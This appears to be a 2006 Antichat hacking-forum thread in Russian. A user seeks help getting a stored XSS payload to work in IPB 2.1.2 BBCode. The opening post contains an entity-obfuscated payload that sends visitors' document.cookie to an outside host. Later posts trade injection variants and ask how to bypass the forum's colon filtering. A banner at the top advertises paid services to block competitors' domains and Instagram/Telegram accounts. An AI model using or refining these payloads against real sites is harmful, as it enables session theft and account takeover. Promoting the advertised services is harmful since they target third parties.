Форум АНТИЧАТ - Вопрос про XSS на форуме IPB 2.1.2.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Вопрос про XSS на форуме IPB 2.1.2.

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос про XSS на форуме IPB 2.1.2.

09.01.2006, 23:08

Astro

Познающий

Регистрация: 29.07.2005

Сообщений: 35

Провел на форуме:
126493

Репутация: 3

Вопрос про XSS на форуме IPB 2.1.2.

Вот пытаюсь вставить эту XSS:

Код HTML:

[post=1000[topic=target style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]       [/topic]]

Естественно без звездочек, пост на форуме пустой если поставить алерт

Код HTML:

[post=1000[topic=target style=background:url(javascript:alert()); ]       [/topic]]

, то он не выскакивает.

09.01.2006, 23:09

max_pain89

Постоянный

Регистрация: 11.12.2004

Сообщений: 592

Провел на форуме:
2260903

Репутация: 345

каким браузером?

09.01.2006, 23:12

Astro

Познающий

Регистрация: 29.07.2005

Сообщений: 35

Провел на форуме:
126493

Репутация: 3

Ie 6.0

09.01.2006, 23:17

max_pain89

Постоянный

Регистрация: 11.12.2004

Сообщений: 592

Провел на форуме:
2260903

Репутация: 345

Попробуй таким макаром

Код HTML:

[topic=1000[post=aaa/ style=background:url(javascript:alert()); [/topic][/post]

10.01.2006, 16:11

Astro

Познающий

Регистрация: 29.07.2005

Сообщений: 35

Провел на форуме:
126493

Репутация: 3

Не выходит, даже код не скрывает.

10.01.2006, 21:10

Astro

Познающий

Регистрация: 29.07.2005

Сообщений: 35

Провел на форуме:
126493

Репутация: 3

Насколько я поял, дело здесь в том, что форум не пропускает двоеточие :
Вот код поста после отсылки его на форум ( Без звездочки)

Код HTML:

		<div class="postcolor" style='padding:4px;'><a href='index.php?act=findpost&pid=1000<a href='index.php?showtopic=target style=background&*#58;url(java script:alert()); '>       </a>'><br /><br /><br /></a></div>

Есть ли возможность обойти это, или подскажите какой нибудь другой код для XSS...

Последний раз редактировалось Astro; 10.01.2006 в 21:18..

10.01.2006, 22:06

max_pain89

Постоянный

Регистрация: 11.12.2004

Сообщений: 592

Провел на форуме:
2260903

Репутация: 345

&*#58; естественно без звезды

10.01.2006, 22:19

Astro

Познающий

Регистрация: 29.07.2005

Сообщений: 35

Провел на форуме:
126493

Репутация: 3

Ну просто без звезды здесь &*#58; пробразуеться в двоеточие, а это уже не то, что было в коде поста, после отправки на форум.
Так есть ли другой код или способ обойти фильтрацию двоеточий?

Последний раз редактировалось Astro; 11.01.2006 в 15:08..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Вопрос по уязвимостям в форуме vBulletin v.3.0.8	GaD	Форумы	27	20.01.2006 02:29
Вопрос про уязвимости в Ipb 2.1.2	Dread	Форумы	1	30.12.2005 21:39
ЕсТь ВоПрос	Guma	Чаты	4	26.10.2005 21:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход